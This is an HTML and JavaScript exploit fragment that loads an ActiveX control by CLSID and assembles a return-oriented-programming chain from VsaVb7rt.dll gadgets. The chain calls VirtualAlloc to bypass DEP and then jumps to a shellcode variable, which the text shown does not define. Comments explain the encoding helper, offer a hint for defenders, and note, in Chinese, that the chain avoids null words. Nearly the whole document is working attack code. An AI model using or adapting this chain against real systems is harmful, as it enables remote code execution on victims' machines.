<!-- Instantiates an ActiveX control by CLSID. The element carries no id, no
     data attribute and no <param> children, and the script below never refers
     to it, so it is presumably loaded only for whatever happens at
     instantiation (confirm against the control itself). For defenders, the
     pattern on this page is an <object classid> load followed by a large
     unescape()'d "%u"-encoded string; that pairing is what to look for. -->
<object classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F'> </object>
<script>
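// Formats the 32-bit value base+offset as two JavaScript "%uXXXX" escapes in
// little-endian word order (low 16 bits first), so that unescape() produces
// the four bytes of the value in memory order.
// base, offset: integers whose sum is non-negative and fits in 32 bits; a
//   negative sum is not handled (toString(16) would put a "-" into the digits).
// Returns: a string such as "%u4344%u4142" for l32(0, 0x41424344).
// Fix: s, s1 and s2 were assigned without var and leaked into global scope;
// they are now locals, the output is unchanged.
function l32(base, offset) {
  var address = base + offset;
  var s = address.toString(16);
  // left-pad to eight hex digits
  while (s.length < 8) s = "0" + s;
  var s1 = s.substring(0, 4); // high word
  var s2 = s.substring(4, 8); // low word
  return '%u' + s2 + '%u' + s1; // low word first (little-endian)
}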
function f()
{
//http://ropshell.com/ropsearch?h=e46d48a7fe961401f1cbf85531cdf05d&p=neg+e%24x
return unescape("%u3270%u5e28"+ // pop ebx/ret
"%u19b1%u5e26"+ //first call xchg eax,esp/ret
"%uf933%u5e34"+ //start to do somethin pop ecx/ret
"%uFFFF%uFFFF"+ //ecx==FFFFFFFF
"%ub44b%u5e2c"+ // ecx=0 inc ecx/ret
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+ //ecx=0x40
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
l32(0,0xfffff000-1)+
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h
"%u4141%u4141"+ //pop edi no use
"%u4241%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%ub7cc%u5e34"+ // XOR EDX,EDX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+
"%ub5ee%u5e34"+ // ADD EDX,EBX // POP EBX // RETN 0x10[VsaVb7rt.dll]
"%u4141%u4141"+
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
l32(0,0xfffff000-1)+
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h
"%u4141%u4141"+ //pop edi no use
"%u4141%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4
"%u4241%u4141"+
"%u4242%u4141"+
"%u4243%u4141"+
"%u4244%u4141"+
"%u4245%u4141"+
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4245%u4141"+
"%u113c%u5e23"+ // ptr to &VirtualAlloc() [IAT VsaVb7rt.dll]
"%u2a5f%u5e2a"+ // MOV EAX,DWORD PTR DS:[EAX] // RETN [VsaVb7rt.dll]
"%u4536%u5e30"+ // XCHG EAX,ESI // RETN [VsaVb7rt.dll]
"%ubd6f%u5e28"+ // POP EBP // RETN [VsaVb7rt.dll]
"%u7050%u5e28"+ // & jmp esp [VsaVb7rt.dll]
"%uff8d%u5e24"+ // POP EDI // RETN [VsaVb7rt.dll]
"%u315c%u5e28"+ // RETN (ROP NOP) [VsaVb7rt.dll]
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u9090%u9090"+ // nop
"%u22cc%u5e2f"+ // PUSHAD // RETN [VsaVb7rt.dll]
shellcode);
}
做这么复杂主要是因为0x0000的截断问题,所以这里避免在链中出现%u0000